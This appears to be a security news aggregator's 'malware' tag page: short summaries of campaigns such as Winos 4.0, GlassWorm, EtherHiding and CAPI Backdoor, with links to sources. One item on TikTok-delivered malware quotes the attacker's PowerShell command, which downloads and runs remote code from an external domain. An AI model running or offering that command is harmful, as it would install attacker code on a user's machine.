Tag: malware
-
ColdRiver Drops Fresh Malware on Targets
The Russia-backed threat actor’s latest cyber spying campaign is a classic example of how quickly sophisticated hacking groups can pivot when exposed. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/coldriver-drops-fresh-malware-targets
-
Winos 4.0 Malware Uses Weaponized PDFs Posing as Government Departments to Infect Windows Machines
Security researchers are tracking a high-severity malware campaign that uses weaponized PDF files to distribute the Winos 4.0 malware. The threat actors impersonate government departments to trick users into opening malicious documents that infect Microsoft Windows machines. The campaign, first observed in early 2025, has since expanded its operations from Taiwan to Japan and Malaysia,…
-
131 Malicious Chrome Extensions Discovered Targeting WhatsApp Users
A new wave of spamware targeting WhatsApp Web users has emerged, as the Socket Threat Research Team revealed the discovery of 131 malicious Chrome extensions actively flooding the Chrome Web Store. These extensions are not conventional malware, but function as high-risk automation tools, systematically violating platform policies to facilitate large-scale spam campaigns, primarily targeting Brazilian…
-
Self-spreading GlassWorm malware hits OpenVSX, VS Code registries
A new and ongoing supply-chain attack is targeting developers on the OpenVSX and Microsoft Visual Studio marketplaces with self-spreading malware called GlassWorm that has been installed an estimated 35,800 times. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/self-spreading-glassworm-malware-hits-openvsx-vs-code-registries/
-
CAPI Backdoor targets Russia’s auto and e-commerce sectors
A new campaign targets Russia’s auto and e-commerce sectors using a previously unknown .NET malware called CAPI Backdoor. Cybersecurity researchers at Seqrite Labs uncovered a new campaign, tracked as Operation MotorBeacon, that targeted the Russian automobile and e-commerce sectors with a previously unknown .NET malware dubbed CAPI Backdoor. >>SEQRITE Labs Research Team has recently uncovered a…
-
Threat actors are spreading malicious extensions via VS marketplaces
What are VS extensions: Extensions and themes can be added to Visual Studio code to make life easier for developers, as well as to enhance functionality. An extension can add features like debuggers, new languages, or other development tools, while a theme is a type of extension that changes the appearance of the editor, controlling things like colors…
-
Threat actors are spreading malicious extensions via VS marketplaces
What are VS extensions: Extensions and themes can be added to Visual Studio code to make life easier for developers, as well as to enhance functionality. An extension can add features like debuggers, new languages, or other development tools, while a theme is a type of extension that changes the appearance of the editor, controlling things like colors…
-
Microsoft Revokes 200+ Fake Certificates Used in Teams Malware Attack
Microsoft has revoked over 200 fraudulent code-signing certificates used in a ransomware campaign involving fake Teams installers by threat group Vanilla Tempest First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/microsoft-revokes-200-fake/
-
North Korea’s UNC5342 APT Uses EtherHiding to Store Malware in Blockchain Smart Contracts for Stealthy C2
The post North Korea’s UNC5342 APT Uses EtherHiding to Store Malware in Blockchain Smart Contracts for Stealthy C2 appeared first on Daily CyberSecurity. First seen on securityonline.info Jump to article: securityonline.info/north-koreas-unc5342-apt-uses-etherhiding-to-store-malware-in-blockchain-smart-contracts-for-stealthy-c2/
-
Achtung: Xubuntu-Webseite verteilte seit Okt. 2025 Malware
Noch eine kurze Warnung für Linux-Interessenten, die sich für Xubuntu interessieren. Es gibt Berichte, dass die betreffende Xubuntu-Webseite Malware verteilen könnte. Inzwischen ist die Download-Seite deaktiviert. Also Vorsicht walten lassen und heruntergeladenes möglichst nicht verwenden, bis das geklärt ist. Diskussion auf … First seen on borncity.com Jump to article: www.borncity.com/blog/2025/10/19/achtung-xubuntu-webseite-verteilte-malware/
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 67
Tags: banking, control, github, international, korea, malicious, malware, north-korea, resilience, rustSecurity Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter Astaroth: Banking Trojan Abusing GitHub for Resilience North Korea’s Contagious Interview Campaign Escalates: 338 Malicious npm Packages, 50,000 Downloads New Rust Malware >>ChaosBot
-
Security Affairs newsletter Round 546 by Pierluigi Paganini INTERNATIONAL EDITION
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Winos 4.0 hackers expand to Japan and Malaysia with new malware From Airport chaos to cyber…
-
Nordkorea setzt auf Blockchain: Staatshacker nutzen >>EtherHiding<<
Die Google Threat Intelligence Group hat eine neuartige Angriffsmethode nordkoreanischer Hacker dokumentiert. Erstmals nutzt eine staatlich geförderte Gruppe dezentrale Blockchains, um Malware-Befehle zu verschleiern eine Technik, die sich kaum unterbinden lässt. First seen on it-daily.net Jump to article: www.it-daily.net/it-sicherheit/cybercrime/nordkorea-setzt-auf-blockchain-staatshacker-nutzen-etherhiding
-
Winos 4.0 hackers expand to Japan and Malaysia with new malware
Winos 4.0 hackers expand from China, Taiwan to Japan, Malaysia using fake Finance Ministry PDFs to spread HoldingHands RAT malware. Threat actors behind Winos 4.0 (ValleyRAT) have expanded their attacks from China and Taiwan to Japan and Malaysia, using PDFs disguised as documents from the Finance Ministry to deliver malware. Attackers employed another remote access…
-
New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs
Cybersecurity researchers have shed light on a new campaign that has likely targeted the Russian automobile and e-commerce sectors with a previously undocumented .NET malware dubbed CAPI Backdoor.According to Seqrite Labs, the attack chain involves distributing phishing emails containing a ZIP archive as a way to trigger the infection. The cybersecurity company’s analysis is based…
-
Hackers Dox ICE, DHS, DOJ, and FBI Officials
Plus: A secret FBI anti-ransomware task force gets exposed, the mystery of the CIA’s Kryptos sculpture is finally solved, North Koreans busted hiding malware in the Ethereum blockchain, and more. First seen on wired.com Jump to article: www.wired.com/story/security-news-this-week-hackers-dox-ice-dhs-doj-and-fbi-officials/
-
Nordkorea nutzt EtherHiding: Staatliche Malware versteckt sich in Blockchains
Der Einsatz der EtherHiding-Technik durch UNC5342 bietet eine äußerst widerstandsfähige Methode, um Angriffe fortzusetzen und Sicherheitsmaßnahmen zu umgehen. Sie erschwert es erheblich, bösartige Aktivitäten zu blockieren oder die Infrastruktur der Angreifer stillzulegen. First seen on infopoint-security.de Jump to article: www.infopoint-security.de/nordkorea-nutzt-etherhiding-staatliche-malware-versteckt-sich-in-blockchains/a42401/
-
Kein Deal, sondern Malware: Wie Cyberkriminelle die Amazon Prime Days für ihre Zwecke ausnutzen
Tags: malwareFirst seen on t3n.de Jump to article: t3n.de/news/malware-statt-deal-amazon-prime-days-cyberkriminelle-1712301/
-
Silver Fox Expands Winos 4.0 Attacks to Japan and Malaysia via HoldingHands RAT
The threat actors behind a malware family known as Winos 4.0 (aka ValleyRAT) have expanded their targeting footprint from China and Taiwan to target Japan and Malaysia with another remote access trojan (RAT) tracked as HoldingHands RAT (aka Gh0stBins).”The campaign relied on phishing emails with PDFs that contained embedded malicious links,” Pei Han Liao, researcher…
-
Cybersecurity Snapshot: F5 Breach Prompts Urgent U.S. Gov’t Warning, as OpenAI Details Disrupted ChatGPT Abuses
Tags: ai, attack, awareness, backdoor, breach, business, chatgpt, china, cisa, cloud, control, corporate, cve, cyber, cybersecurity, data, data-breach, defense, detection, exploit, framework, fraud, governance, government, group, hacker, incident, infrastructure, Internet, iran, law, LLM, malicious, malware, mitigation, monitoring, network, openai, organized, phishing, privacy, resilience, risk, russia, scam, security-incident, service, software, strategy, supply-chain, technology, threat, training, update, vulnerabilityF5’s breach triggers a CISA emergency directive, as Tenable calls it “a five-alarm fire” that requires urgent action. Meanwhile, OpenAI details how attackers try to misuse ChatGPT. Plus, boards are increasing AI and cyber disclosures. And much more! Key takeaways A critical breach at cybersecurity firm F5, attributed to a nation-state, has triggered an urgent…
-
North Korean Hackers Use Blockchain to Hide Crypto-Stealing Malware
North Korean hackers are using blockchain smart contracts to hide malware and steal cryptocurrency. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/north-korean-hackers-use-blockchain-to-hide-crypto-stealing-malware/
-
North Korean Hackers Use Blockchain to Hide Crypto-Stealing Malware
North Korean hackers are using blockchain smart contracts to hide malware and steal cryptocurrency. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/north-korean-hackers-use-blockchain-to-hide-crypto-stealing-malware/
-
North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware
The North Korean threat actor linked to the Contagious Interview campaign has been observed merging some of the functionality of two of its malware programs, indicating that the hacking group is actively refining its toolset.That’s according to new findings from Cisco Talos, which said recent campaigns undertaken by the hacking group have seen the functions…
-
North Korean Hackers Use EtherHiding to Steal Crypto
Google reveals North Korean hackers are using EtherHiding, a blockchain-based technique, to deliver malware and steal cryptocurrency First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/nk-hackers-etherhiding-steal-crypto/
-
TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware
Attackers are exploiting TikTok’s massive reach to trick users into executing malware through seemingly innocuous videos. In one popular TikTok video (liked over 500 times), the attacker poses as a provider of a free Photoshop activation tool and urges viewers to open PowerShell as an administrator and run: powershelliex (irm slmgr.win/photoshop) This command uses Invoke-Expression…
-
ClickFake Interview Campaign Used by Threat Actors to Deliver OtterCandy Malware
A North Korean-linked group, WaterPlum’s Cluster B, has evolved its tactics by introducing OtterCandy”, a Node.jsbased RAT and information stealer”, through the ClickFake Interview campaign, with significant enhancements observed in August 2025. This threat actor, attributed to North Korea, orchestrated two primary campaigns: Contagious Interview and ClickFake Interview. Although multiple clusters operate under the WaterPlum…
-
Malicious Perplexity Comet Browser Download Ads Push Malware Via Google
Attackers are exploiting Google Ads with fake Comet Browser download links to spread malware disguised as Perplexity’s official installer. The campaign, tracked by DataDome, has ties to DarkGate. First seen on hackread.com Jump to article: hackread.com/perplexity-comet-browser-download-ads-malware-google/
-
Malicious Perplexity Comet Browser Download Ads Push Malware Via Google
Attackers are exploiting Google Ads with fake Comet Browser download links to spread malware disguised as Perplexity’s official installer. The campaign, tracked by DataDome, has ties to DarkGate. First seen on hackread.com Jump to article: hackread.com/perplexity-comet-browser-download-ads-malware-google/